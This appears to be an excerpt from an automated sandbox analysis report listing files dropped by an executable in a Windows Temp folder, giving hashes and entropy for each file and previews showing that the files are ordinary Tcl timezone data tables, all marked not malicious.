                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/New_York) {. {-9223372036854775808 -17762 0 LMT}. {-2717650800 -18000 0 EST}. {-1633280400 -14400 1 EDT}. {-1615140000 -18000 0 EST}. {-1601830800 -14400 1 EDT}. {-1583690400 -18000 0 EST}. {-1577905200 -18000 0 EST}. {-1570381200 -14400 1 EDT}. {-1551636000 -18000 0 EST}. {-1536512400 -14400 1 EDT}. {-1523210400 -18000 0 EST}. {-1504458000 -14400 1 EDT}. {-1491760800 -18000 0 EST}. {-1473008400 -14400 1 EDT}. {-1459706400 -18000 0 EST}. {-1441558800 -14400 1 EDT}. {-1428256800 -18000 0 EST}. {-1410109200 -14400 1 EDT}. {-1396807200 -18000 0 EST}. {-1378659600 -14400 1 EDT}. {-1365357600 -18000 0 EST}. {-1347210000 -14400 1 EDT}. {-1333908000 -18000 0 EST}. {-1315155600 -14400 1 EDT}. {-1301853600 -18000 0 EST}. {-1283706000 -14400 1 EDT}. {-1270404000 -18000 0 EST}. {-1252256400 -14400 1 EDT}. {-1238954400 -18000 0 EST}. {-122080680
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7836
                                                                                                                                                                                                                                                    Entropy (8bit):3.7462966187089535
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:rEa2raC3Xm8sHRwvOTFhP5S+ijFnRaJeaX1eyDt:rYrrn+qvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:3D389AA51D3E29E8A1E8ED07646AA0DD
                                                                                                                                                                                                                                                    SHA1:2E3DF9406B14662ADEDDC0F891CD81DF23D98157
                                                                                                                                                                                                                                                    SHA-256:3A0FB897E5CCB31B139E009B909053DCE36BB5791ACF23529D874AFA9F0BB405
                                                                                                                                                                                                                                                    SHA-512:AFF7B30355ECB6EBD43D1E6C943C250AB98CC82BDC8DDC7595769E4CE188A23591AEFCF18A028CC6479CF6AA20F65980E37C74F6CEE907537366136FAF29B66E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8404
                                                                                                                                                                                                                                                    Entropy (8bit):3.8859165156616937
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:OMmWQm825s/Q7Ddh5sBPyNsSLFOMM/EowALVZVmWa86Eac8rQ:OMmWQmI/4h5sBPy+CMt/ElALLVuAH
                                                                                                                                                                                                                                                    MD5:ECBBCB3C63125333C1339EFF2C02BACE
                                                                                                                                                                                                                                                    SHA1:293B8D9314F57F54A7C0457C0C661A5DB2EFE026
                                                                                                                                                                                                                                                    SHA-256:9739527976A9FF2753C1D986C3901F9A537E1F9387BE2543BB00257DD9D8881A
                                                                                                                                                                                                                                                    SHA-512:AB22FC48ABC2B773522F37B929961774B80B1EF4CE76837AEDB1E6640DEB4D8C46CE89E3A24854F2D684579EB1BD9790AF9EBDFF3556A621ECB2AF66F32EC256
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1368
                                                                                                                                                                                                                                                    Entropy (8bit):4.01376478240381
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQ8eHChYsS590B74LmCUGXx1bvzbsgEfKaccbMuSEh:5ghYsSDK74LmCUGB1bvzbsgEfK1couSK
                                                                                                                                                                                                                                                    MD5:38D2ADBD4CC7A54D3EDDC120BE4E32E9
                                                                                                                                                                                                                                                    SHA1:07AEFC41171850277C4ECF30B3C5108ED196926D
                                                                                                                                                                                                                                                    SHA-256:03C9461769527F6D7639E79CBACB71452B01BA08172D1105D2AC36458622F0D7
                                                                                                                                                                                                                                                    SHA-512:F6FBE1E1AB9D66A12DEEAC6FA5536B0ACFC9F777D5E270B05BD3144B1065AE02BEC157A57686F5EDA443498BA1B01B9F445C902ADCB33412FE73036AD3B29CFE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8278
                                                                                                                                                                                                                                                    Entropy (8bit):3.7975723806562063
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:raF2dVtXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Dac5TE35:OFcVtXwDTIRqfh57Tlto//q7u379zlqw
                                                                                                                                                                                                                                                    MD5:15AABAE9ABE4AF7ABEADF24A510E9583
                                                                                                                                                                                                                                                    SHA1:3DEF11310D02F0492DF09591A039F46A8A72D086
                                                                                                                                                                                                                                                    SHA-256:B328CC893D217C4FB6C84AA998009940BFBAE240F944F40E7EB900DEF1C7A5CF
                                                                                                                                                                                                                                                    SHA-512:7A12A25EB6D6202C47CFDD9F3CE71342406F0EDA3D1D68B842BCFE97EFF1F2E0C11AD34D4EE0A61DF7E0C7E8F400C8CCA73230BDB3C677F8D15CE5CBA44775D7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8278
                                                                                                                                                                                                                                                    Entropy (8bit):3.7834920003907664
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:LF2dK7X0N41+IestuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaT:LFcK7X0N41+IestuNEbYkzbXwDTIRqfK
                                                                                                                                                                                                                                                    MD5:AC804124F4CE4626F5C1FDA2BC043011
                                                                                                                                                                                                                                                    SHA1:4B3E8CC90671BA543112CEE1AB5450C6EA4615DF
                                                                                                                                                                                                                                                    SHA-256:E90121F7D275FDCC7B8DCDEC5F8311194D432510FEF5F5F0D6F211A4AACB78EF
                                                                                                                                                                                                                                                    SHA-512:056EF65693C16CB58EC5A223528C636346DB37B75000397D03663925545979792BBC50B20B5AA20139ECE9A9D6B73DA80C2319AA4F0609D6FC1A6D30D0567C58
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8281
                                                                                                                                                                                                                                                    Entropy (8bit):3.795939700557522
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:uF2dyuNEbYkzbXwDTIRqfhXbdXvDXpVXVto//q7u379zlq3LtVBaANIsrXHEK5Da:uFcyuNEbYkzbXwDTIRqfh57Tlto//q7k
                                                                                                                                                                                                                                                    MD5:E26FC508DFD73B610C5543487C763FF5
                                                                                                                                                                                                                                                    SHA1:8FBDE67AF561037AAA2EDF93E9456C7E534F4B5A
                                                                                                                                                                                                                                                    SHA-256:387D3C57EDE8CCAAD0655F19B35BC0D124C016D16F06B6F2498C1151E4792778
                                                                                                                                                                                                                                                    SHA-512:8A10B7370D1521EDF18AB4D5192C930ABC68AB9AE718ADF3D175EACE9A1F5DAC690A76B02EFB4059374761962D8C2660497F8E951DFE9812FB3CFCFDF9165E45
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6621
                                                                                                                                                                                                                                                    Entropy (8bit):3.7945318113967823
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5gUFM/6M/Mp5tyTc8Ln4ypZ9giGuWGwZIoktiz+hL5Cw5feQ5BT5rBSNNOVQoh/5:KJNfzo+C2mWBNQMsmNTxf6AeO+cblX
                                                                                                                                                                                                                                                    MD5:D88A28F381C79410D816F8D2D1610A02
                                                                                                                                                                                                                                                    SHA1:81949A1CACD5907CA5A8649385C03813EEFCDDE0
                                                                                                                                                                                                                                                    SHA-256:F65C0F8532387AFE703FACDEE325BF8D7F3D1232DEE92D65426FF917DD582CB3
                                                                                                                                                                                                                                                    SHA-512:9A9B0C65ECDFF690EF2933B323B3A1CF2D67D0A43F285BB9FEEFF275316148A07F5AC044C48F64E3D8CFA7C1DE44AF220A6855DC01225F8BFFF63AEC946B944A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Ojinaga) {. {-9223372036854775808 -25060 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {820476000 -21600 0 CST}. {828864000 -18000 1 CDT}. {846399600 -21600 0 CST}. {860313600 -18000 1 CDT}. {877849200 -21600 0 CST}. {883634400 -21600 0 CST}. {891766800 -21600 0 MDT}. {909302400 -25200 0 MST}. {923216400 -21600 1 MDT}. {941356800 -25200 0 MST}. {954666000 -21600 1 MDT}. {972806400 -25200 0 MST}. {989139600 -21600 1 MDT}. {1001836800 -25200 0 MST}. {1018170000 -21600 1 MDT}. {1035705600 -25200 0 MST}. {1049619600 -21600 1 MDT}. {1067155200 -25200 0 MST}. {1081069200 -21600 1 MDT}. {1099209600 -25200 0 MST}. {1112518800 -21600 1 MDT}. {1130659200 -25200 0 MST}. {1143968400 -21600 1 MDT}. {1162108800 -2520
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                    Entropy (8bit):4.924365872261203
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Panama) {. {-9223372036854775808 -19088 0 LMT}. {-2524502512 -19176 0 CMT}. {-1946918424 -18000 0 EST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7484
                                                                                                                                                                                                                                                    Entropy (8bit):3.7727467213469943
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Pangnirtung) {. {-9223372036854775808 0 0 zzz}. {-1546300800 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-147902400 -7200 1 ADDT}. {-131572800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}. {357112800 -10800 1 ADT}. {372834000 -14400 0 AST}. {388562400 -10800 1 ADT}. {404888400 -14400 0 AST}. {420012000 -10800 1 ADT}. {436338000 -14400 0 AST}. {452066400 -10800 1 ADT}. {467787600 -14400 0 AST}. {483516000 -10800 1 ADT}. {499237200 -14400 0 AST}. {514965600 -10800 1 ADT}. {530686800 -14400 0 AST}. {544600800 -10800 1 ADT}. {562136400 -14400 0 AST}. {576050400 -10800 1 ADT}. {594190800 -14400 0 AST}. {607500000 -10800 1 ADT}. {625640400 -14400 0 AST}. {638949600 -10800 1 ADT}. {657090000 -14400 0 AST}. {671004000 -10800 1 ADT}. {688539600 -14400 0 AST}. {702
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):272
                                                                                                                                                                                                                                                    Entropy (8bit):4.78889293057406
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Paramaribo) {. {-9223372036854775808 -13240 0 LMT}. {-1861906760 -13252 0 PMT}. {-1104524348 -13236 0 PMT}. {-765317964 -12600 0 NEGT}. {185686200 -12600 0 SRT}. {465449400 -10800 0 SRT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):479
                                                                                                                                                                                                                                                    Entropy (8bit):4.379302206927978
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Phoenix) {. {-9223372036854775808 -26898 0 LMT}. {-2717643600 -25200 0 MST}. {-1633273200 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1601823600 -21600 1 MDT}. {-1583683200 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-820519140 -25200 0 MST}. {-796841940 -25200 0 MST}. {-94669200 -25200 0 MST}. {-84380400 -21600 1 MDT}. {-68659200 -25200 0 MST}. {-56221200 -25200 0 MST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6458
                                                                                                                                                                                                                                                    Entropy (8bit):3.7695898184176624
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Port-au-Prince) {. {-9223372036854775808 -17360 0 LMT}. {-2524504240 -17340 0 PPMT}. {-1670483460 -18000 0 EST}. {421218000 -14400 1 EDT}. {436334400 -18000 0 EST}. {452062800 -14400 1 EDT}. {467784000 -18000 0 EST}. {483512400 -14400 1 EDT}. {499233600 -18000 0 EST}. {514962000 -14400 1 EDT}. {530683200 -18000 0 EST}. {546411600 -14400 1 EDT}. {562132800 -18000 0 EST}. {576050400 -14400 1 EDT}. {594194400 -18000 0 EST}. {607500000 -14400 1 EDT}. {625644000 -18000 0 EST}. {638949600 -14400 1 EDT}. {657093600 -18000 0 EST}. {671004000 -14400 1 EDT}. {688543200 -18000 0 EST}. {702453600 -14400 1 EDT}. {719992800 -18000 0 EST}. {733903200 -14400 1 EDT}. {752047200 -18000 0 EST}. {765352800 -14400 1 EDT}. {783496800 -18000 0 EST}. {796802400 -14400 1 EDT}. {814946400 -18000 0 EST}. {828856800 -14400 1 EDT}. {846396000 -18000 0 EST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):155
                                                                                                                                                                                                                                                    Entropy (8bit):5.077805073731929
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Port_of_Spain) {. {-9223372036854775808 -14764 0 LMT}. {-1825098836 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):196
                                                                                                                                                                                                                                                    Entropy (8bit):4.818272118524638
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:America/Porto_Acre) $TZData(:America/Rio_Branco).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1030
                                                                                                                                                                                                                                                    Entropy (8bit):4.067722644085682
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Porto_Velho) {. {-9223372036854775808 -15336 0 LMT}. {-1767210264 -14400 0 AMT}. {-1206954000 -10800 1 AMST}. {-1191358800 -14400 0 AMT}. {-1175371200 -10800 1 AMST}. {-1159822800 -14400 0 AMT}. {-633816000 -10800 1 AMST}. {-622065600 -14400 0 AMT}. {-602280000 -10800 1 AMST}. {-591829200 -14400 0 AMT}. {-570744000 -10800 1 AMST}. {-560206800 -14400 0 AMT}. {-539121600 -10800 1 AMST}. {-531349200 -14400 0 AMT}. {-191361600 -10800 1 AMST}. {-184194000 -14400 0 AMT}. {-155160000 -10800 1 AMST}. {-150066000 -14400 0 AMT}. {-128894400 -10800 1 AMST}. {-121122000 -14400 0 AMT}. {-99950400 -10800 1 AMST}. {-89586000 -14400 0 AMT}. {-68414400 -10800 1 AMST}. {-57963600 -14400 0 AMT}. {499752000 -10800 1 AMST}. {511239600 -14400 0 AMT}. {530596800 -10800 1 AMST}. {540270000 -14400 0 AMT}. {562132800 -10800 1 AMST}. {571201200 -14400 0 AMT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):273
                                                                                                                                                                                                                                                    Entropy (8bit):4.728240676465187
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Puerto_Rico) {. {-9223372036854775808 -15865 0 LMT}. {-2233035335 -14400 0 AST}. {-873057600 -10800 0 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-757368000 -14400 0 AST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7840
                                                                                                                                                                                                                                                    Entropy (8bit):3.75014960690837
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rainy_River) {. {-9223372036854775808 -22696 0 LMT}. {-2366732504 -21600 0 CST}. {-1632067200 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-923248800 -18000 1 CDT}. {-880214400 -18000 0 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {136368000 -18000 1 CDT}. {152089200 -21600 0 CST}. {167817600 -18000 1 CDT}. {183538800 -21600 0 CST}. {199267200 -18000 1 CDT}. {215593200 -21600 0 CST}. {230716800 -18000 1 CDT}. {247042800 -21600 0 CST}. {262771200 -18000 1 CDT}. {278492400 -21600 0 CST}. {294220800 -18000 1 CDT}. {309942000 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7366
                                                                                                                                                                                                                                                    Entropy (8bit):3.753795978502298
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rankin_Inlet) {. {-9223372036854775808 0 0 zzz}. {-410227200 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {75205
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1391
                                                                                                                                                                                                                                                    Entropy (8bit):3.990359910189371
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Recife) {. {-9223372036854775808 -8376 0 LMT}. {-1767217224 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -7200
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1723
                                                                                                                                                                                                                                                    Entropy (8bit):3.956012642028802
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Regina) {. {-9223372036854775808 -25116 0 LMT}. {-2030202084 -25200 0 MST}. {-1632063600 -21600 1 MDT}. {-1615132800 -25200 0 MST}. {-1251651600 -21600 1 MDT}. {-1238349600 -25200 0 MST}. {-1220202000 -21600 1 MDT}. {-1206900000 -25200 0 MST}. {-1188752400 -21600 1 MDT}. {-1175450400 -25200 0 MST}. {-1156698000 -21600 1 MDT}. {-1144000800 -25200 0 MST}. {-1125248400 -21600 1 MDT}. {-1111946400 -25200 0 MST}. {-1032714000 -21600 1 MDT}. {-1016992800 -25200 0 MST}. {-1001264400 -21600 1 MDT}. {-986148000 -25200 0 MST}. {-969814800 -21600 1 MDT}. {-954093600 -25200 0 MST}. {-937760400 -21600 1 MDT}. {-922039200 -25200 0 MST}. {-906310800 -21600 1 MDT}. {-890589600 -25200 0 MST}. {-880210800 -21600 1 MWT}. {-769395600 -21600 1 MPT}. {-765388800 -25200 0 MST}. {-748450800 -21600 1 MDT}. {-732729600 -25200 0 MST}. {-715791600 -21600 1 MDT}
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7362
                                                                                                                                                                                                                                                    Entropy (8bit):3.7499369602687835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Resolute) {. {-9223372036854775808 0 0 zzz}. {-704937600 -21600 0 CST}. {-147895200 -14400 1 CDDT}. {-131565600 -21600 0 CST}. {325670400 -18000 1 CDT}. {341391600 -21600 0 CST}. {357120000 -18000 1 CDT}. {372841200 -21600 0 CST}. {388569600 -18000 1 CDT}. {404895600 -21600 0 CST}. {420019200 -18000 1 CDT}. {436345200 -21600 0 CST}. {452073600 -18000 1 CDT}. {467794800 -21600 0 CST}. {483523200 -18000 1 CDT}. {499244400 -21600 0 CST}. {514972800 -18000 1 CDT}. {530694000 -21600 0 CST}. {544608000 -18000 1 CDT}. {562143600 -21600 0 CST}. {576057600 -18000 1 CDT}. {594198000 -21600 0 CST}. {607507200 -18000 1 CDT}. {625647600 -21600 0 CST}. {638956800 -18000 1 CDT}. {657097200 -21600 0 CST}. {671011200 -18000 1 CDT}. {688546800 -21600 0 CST}. {702460800 -18000 1 CDT}. {719996400 -21600 0 CST}. {733910400 -18000 1 CDT}. {752050800
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1089
                                                                                                                                                                                                                                                    Entropy (8bit):4.045206708366327
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Rio_Branco) {. {-9223372036854775808 -16272 0 LMT}. {-1767209328 -18000 0 ACT}. {-1206950400 -14400 1 ACST}. {-1191355200 -18000 0 ACT}. {-1175367600 -14400 1 ACST}. {-1159819200 -18000 0 ACT}. {-633812400 -14400 1 ACST}. {-622062000 -18000 0 ACT}. {-602276400 -14400 1 ACST}. {-591825600 -18000 0 ACT}. {-570740400 -14400 1 ACST}. {-560203200 -18000 0 ACT}. {-539118000 -14400 1 ACST}. {-531345600 -18000 0 ACT}. {-191358000 -14400 1 ACST}. {-184190400 -18000 0 ACT}. {-155156400 -14400 1 ACST}. {-150062400 -18000 0 ACT}. {-128890800 -14400 1 ACST}. {-121118400 -18000 0 ACT}. {-99946800 -14400 1 ACST}. {-89582400 -18000 0 ACT}. {-68410800 -14400 1 ACST}. {-57960000 -18000 0 ACT}. {499755600 -14400 1 ACST}. {511243200 -18000 0 ACT}. {530600400 -14400 1 ACST}. {540273600 -18000 0 ACT}. {562136400 -14400 1 ACST}. {571204800 -18000 0 ACT}.
